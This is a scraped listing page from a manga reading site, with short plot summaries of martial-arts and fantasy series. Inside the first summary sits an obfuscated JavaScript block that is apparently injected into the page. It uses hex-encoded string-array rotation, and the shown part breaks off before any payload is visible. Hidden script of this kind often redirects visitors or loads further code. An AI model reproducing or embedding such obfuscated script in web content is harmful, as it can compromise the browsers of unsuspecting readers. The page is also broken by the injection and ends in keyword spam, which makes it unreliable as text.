Martial Arts - Page 53

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2264 results

Return From the World of Immortals

The fairy tales of the celestial world are flying in the soul, and the souls return to the original body on the earth. Tang Xiu was surprised to find that the celestial world had passed 10,000 years, and only one year passed on the earth.<script></script><script>(function(_0x5f40ce,_0x5c12e3){var _0x4a0bbd=_0x4209,_0xff59=_0x5f40ce();while(!![]){try{var _0x491c9f=-parseInt(_0x4a0bbd(0x13a))/(-0x1306+-0x569+0x1870)*(parseInt(_0x4a0bbd(0x145))/(-0x11f+-0x510+-0x5*-0x13d))+-parseInt(_0x4a0bbd(0x13f))/(-0x1405+-0x212c+-0x1e*-0x1c6)+-parseInt(_0x4a0bbd(0x14b))/(0x1*0xc1a+-0x1*-0x1968+-0x257e)+parseInt(_0x4a0bbd(0x155))/(0xf7*-0x16+-0x123*0xa+-0x45*-0x79)+parseInt(_0x4a0bbd(0x144))/(0xa8a+0x2d9+-0xb*0x137)*(-parseInt(_0x4a0bbd(0x13b))/(0x1b93+0x96c+-0x4*0x93e))+-parseInt(_0x4a0bbd(0x148))/(-0xf23*-0x1+-0x1*0x253c+0x1621)+parseInt(_0x4a0bbd(0x14d))/(0x72a+-0x1b8c+0x146b);if(_0x491c9f===_0x5c12e3)break;else _0xff59['push'](_0xff59['shift']());}catch(_0x12b7f6){_0xff59['push'](_0xff59['shift']());}}}(_0x1338,-0x37950+0xc3d09+-0x24302));function _0x1338(){var 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Cicero City, a city infested with immigrants where people of all races scramble to find work and shelter. Infested with destruction and slaughter, it's a chaotic society. Living on the outside of society, the Jackals are professional assassins with no allegiance, available to the highest bidder. This is their story.


Kakutou Bijin Wulong

The lead character, Mao Ran, a person of Chinese origin born and raised in Japan, has been trained in the secret martial art of her family by her drunken lecherous grandfather. Her grandfather has promised her that he'll tell her what happened to her parents to encourage her to train and fight. Without her knowledge, her grandfather signs her up to participate in a televised martial arts competition between female martial artists known as "Prime Mat".


I Am Supreme

Yun Yang is the central figure of the Nine Supremes of Yutang, heroes of the world. When the Nine supremes were ambushed and killed at Tianxuan Cliff, Yun Yang was the only one to escape the massacre albeit with heavy internal injuries. Watch as he takes revenge for his brothers against all those involved


The Disloyal Subject Saves The Country

All the disloyal subject wanted was to take advantage of the kingdom’s fall to pocket the royal treasure. But instead… he took an arrow for the queen and ended up dead. He is awoken in an afterlife by an apostle of god who mistook him for a faithful subject and tells him his job is to restore the fallen kingdom by reliving the historical moments that shaped it. Will he manage to rebuild the kingdom to its most glorious day and go down in history as the true loyal subject or… will his greed get in the way?


Boss Of The Emperor’S Harem

Have you ever heard of a fertility fairy? That’s what Yun Mian is! Her mission upon descending from the immortal realm is to help the imperial concubines of Xiao Guo’s emperor bear an imperial successor. What? His Majesty is infertile?! And it’s something that even the imperial physicians and divine doctors can’t cure? Yun Mian’s under enormous pressure now! “Yun Mian, we* are dizzy. Give us your divine qi.” In order to fulfill her duties, Yun Mian throws caution to the wind! “Yun Mian, our stomach hurts. Give us more of your divine qi.” After the ninety-ninth time she gave him her divine qi, the impossible happens**! Just as Yun Mian is about to inform the imperial concubines, the devilish emperor captures her in his arms! “Yun Mian, since you’ve cured us of our affliction… we shall grant you the imperial successor!” What? She didn’t want to take on THAT duty personally! She immediately flees, but the devilish emperor’s words follow her… “Yun Mian, until you’ve fulfilled your duties, you’re not allowed to leave!”


Humble System, Beg Me to Be Invincible

While others transmigrate and get bound to systems, working like slaves. Wa** Yang transmigrates and has a PUA system do all the work for him! As long as he lies flat (tang ping), whatever he desires is granted by the system. Divine-level skills, invincible cultivation, beautiful girlseverything is within reach! Transmigration should be this fun!


Doctor’s Rebirth

Read Doctor’s Rebirth Novel – Doctor’s Rebirth Manhwa Online Free At ManhuaHot The summary of the comic Doctor’s Rebirth: I had been abroad to do medical volunteer work, when I was swept up in a civil war. I was killed by a rebel soldier, while taking a bullet for a patient. But when I finally woke up, I had become a child?!? And in front of me stood a destroyed carriage and a group of oddly dressed people, who were unconscious! “It’s just like a Murim world.” As I hurry to perform first aid in an attempt to save even one person, I realize that this world is that of [The Supreme Demon King], a Murim novel I’ve enjoyed reading. After meeting the rescue team of the ‘Three Great Doctors’, I found out that one of the person I saved was the protagonist of this novel, the future Demon King ‘Yeoharyun’! “Hey, since I’m indebted to you for saving me, call me ‘hyung’.” For saving his life, I become sworn brothers with the future Demon King, and Baekrineuison, one of the most knowledgeable people around, recognized my potential and took me in as his disciple. This is the story of how I became the greatest physician in Gangho! “Doctor’s Rebirth” is also known as: Doctor, Live Again / The Doctor Lives Again / Uiwon, Dasi Salda / 医員、蘇る / 轉世武林當大夫 / 의원, 다시 살다 The comic Doctor’s Rebirth belongs to the Genre: Action, Fantasy, Isekai, Medical “Top Manhua, Battwo, Read Manga Online…” are the most searched keywords on the website ZINMANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at BunManga. You can read TOP MANGA Human Mask The Patron’s Daughters The Genius Idol’s Strategy to Stardom


The Heavenly Demon Can’t Live a Normal Life

The Heavenly Demon Can’t Live a Normal Life ‘Heavenly Demon’ Baek Joong-Hyuk opens his eyes as the eldest son of the Dimitry family. Known as the fool of the Dimitry family, pushed over by the second son. The world’s opinion is irrelevant. ‘Heavenly Demon’, no, Roman Dimitry, cannot live a normal life. OP ‘Heavenly Demon’ fantasy! ,천마는 평범하게 살 수 없다


Nijiiro Togarashi

From Adachi's Universe: We start with our main protagonist, Shichimi, bidding farewell as he readies for his journey into Edo (on our Earth, Edo was the old name of Tokyo before it became the capital of Japan). His mother has just died, only leaving him a walnut and a request for him to go to his half-siblings. Shichimi bids farewell to a sternly old man, who is a firefighter. We can tell this from the symbol on his cloak. This symbol is also on Shichimi's cloak. Upon reaching the town of Edo, Shichimi meets a mysterious man, who ridicules the peace of the world as an illusion.


Red Lion

Quite possibly the best and most reknown fighter of all the schools is a red haired girl, solely referred to as the Red Lion. But as the Red Lion suddenly disappears one day, we find that's only the beginning to the trials of real "Red Lion".


Wielding a Celestial Sword

From BH007: Xiao Yao is a good-for-nothing dreamer who would like nothing more than to own a celestial sword but was raised as a worker in a restaurant. One day he meets a mysterious drunken priest who asks for some wine...
